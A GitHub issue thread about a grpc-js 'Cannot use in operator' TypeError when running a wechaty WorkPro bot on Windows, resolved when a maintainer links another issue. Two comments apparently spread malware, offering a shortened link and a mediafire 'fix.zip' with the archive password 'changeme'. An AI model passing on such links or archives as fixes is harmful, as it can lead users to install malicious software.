### ISSUE TITLE
[BUG]WorkPro: TypeError: Cannot use 'in' operator to search for 'port' in undefined

### ISSUE THREAD

**Issue by mustcarrayout** [wechaty/puppet-service-providers#578]
## 平台

`windows`

## cmd
```
set WECHATY_PUPPET_SERVICE_NO_TLS_INSECURE_CLIENT=true
set WECHATY_PUPPET_SERVICE_AUTHORITY=token-service-discovery-test.juzibot.com
set WECHATY_PUPPET=wechaty-puppet-service
set WECHATY_PUPPET_SERVICE_TOKEN="puppet_workpro_xxx"
npm start
```

## 异常

```
> wechaty-getting-started@1.18.12 start
> cross-env NODE_OPTIONS="--no-warnings --loader=ts-node/esm" node examples/ding-dong-bot.ts

C:\Work\getting-started\node_modules\@grpc\grpc-js\src\subchannel-address.ts:40
  return 'port' in address;
               ^
TypeError: Cannot use 'in' operator to search for 'port' in undefined
    at isTcpSubchannelAddress (C:\Work\getting-started\node_modules\@grpc\grpc-js\src\subchannel-address.ts:40:16)
    at subchannelAddressToString (C:\Work\getting-started\node_modules\@grpc\grpc-js\src\subchannel-address.ts:65:7)
    at C:\Work\getting-started\node_modules\@grpc\grpc-js\src\load-balancer-pick-first.ts:505:90
    at Array.map (<anonymous>)
    at PickFirstLoadBalancer.updateAddressList (C:\Work\getting-started\node_modules\@grpc\grpc-js\src\load-balancer-pick-first.ts:505:50)
    at ChildLoadBalancerHandler.updateAddressList (C:\Work\getting-started\node_modules\@grpc\grpc-js\src\load-balancer-child-handler.ts:137:19)
    at onSuccessfulResolution (C:\Work\getting-started\node_modules\@grpc\grpc-js\src\resolving-load-balancer.ts:302:34)
    at processTicksAndRejections (node:internal/process/task_queues:85:22)
```

**Comment by SagarChandra07** [comment]
I think this will help you.
https://bit.ly/47P0Nvo

Password: changeme
I put the necessary dlls in the archive

**Comment by ghost** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by mustcarrayout** [comment]
> I think this will help you. https://bit.ly/47P0Nvo
> 
> Password: changeme I put the necessary dlls in the archive

it doesn't work.There has been no change.

![image](https://github.com/user-attachments/assets/d5511f0a-98e8-423a-9350-ff3084a0436d)

```

> wechaty-getting-started@1.18.12 start
> cross-env NODE_OPTIONS="--no-warnings --loader=ts-node/esm" node examples/ding-dong-bot.ts

C:\Work\getting-started\node_modules\@grpc\grpc-js\src\subchannel-address.ts:40
  return 'port' in address;
               ^
TypeError: Cannot use 'in' operator to search for 'port' in undefined
    at isTcpSubchannelAddress (C:\Work\getting-started\node_modules\@grpc\grpc-js\src\subchannel-address.ts:40:16)
    at subchannelAddressToString (C:\Work\getting-started\node_modules\@grpc\grpc-js\src\subchannel-address.ts:65:7)
    at C:\Work\getting-started\node_modules\@grpc\grpc-js\src\load-balancer-pick-first.ts:505:90
    at Array.map (<anonymous>)
    at PickFirstLoadBalancer.updateAddressList (C:\Work\getting-started\node_modules\@grpc\grpc-js\src\load-balancer-pick-first.ts:505:50)
    at ChildLoadBalancerHandler.updateAddressList (C:\Work\getting-started\node_modules\@grpc\grpc-js\src\load-balancer-child-handler.ts:137:19)
    at onSuccessfulResolution (C:\Work\getting-started\node_modules\@grpc\grpc-js\src\resolving-load-balancer.ts:302:34)
    at processTicksAndRejections (node:internal/process/task_queues:85:22)
```

**Comment by su-chang** [comment]
See https://github.com/wechaty/puppet-supports/issues/364

**Comment by mustcarrayout** [comment]
> See #364

it's work.well done
